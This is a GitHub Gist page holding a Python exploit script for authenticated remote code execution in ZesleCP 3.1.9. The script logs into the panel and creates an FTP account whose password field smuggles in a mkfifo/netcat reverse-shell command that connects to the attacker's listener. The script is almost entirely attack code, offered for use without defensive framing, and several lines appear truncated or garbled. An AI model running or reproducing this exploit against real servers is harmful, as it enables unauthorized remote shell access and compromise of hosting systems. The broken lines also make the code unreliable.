Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
# -*- coding: utf-8 -*-
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
# author:
# usage: [-h] -u HOST -l LOGIN -p PASSWORD
import argparse,requests,warnings,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd
def init():
parser = argparse.ArgumentParser(description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )')
parser.add_argument('-u','--host',help='Host', type=str, required=True)
parser.add_argument('-l', '--login',help='Username', type=str, required=True)
parser.add_argument('-p', '--password',help='Password', type=str, required=True)
args = parser.parse_args()
def exploit(args):
listen_ip = ""
listen_port = 1337
session = requests.Session()
target = "https://{}:2087".format(
username = args.login
password = args.password
print("[+] Target {}".format(target))
login ="/login", verify=False, json={"username":username,"password":password})
login_json = json.loads(login.content)
if login_json["success"]:
session_hand_login = session.cookies.get_dict()
print("[+] Login successfully")
print("[+] Creating ftp account")
ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10))
print("[+] Username : {}".format(ftp_username))
print("[+] Send payload....")
payload = {
"ftp_user": ftp_username,
"ftp_password":"1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip,listen_port)
feth_weblist ="/core/ftp", verify=False, json=payload, timeout=3)
except requests.exceptions.ReadTimeout:
print("[+] Successful")
print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))
if __name__ == "__main__":
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment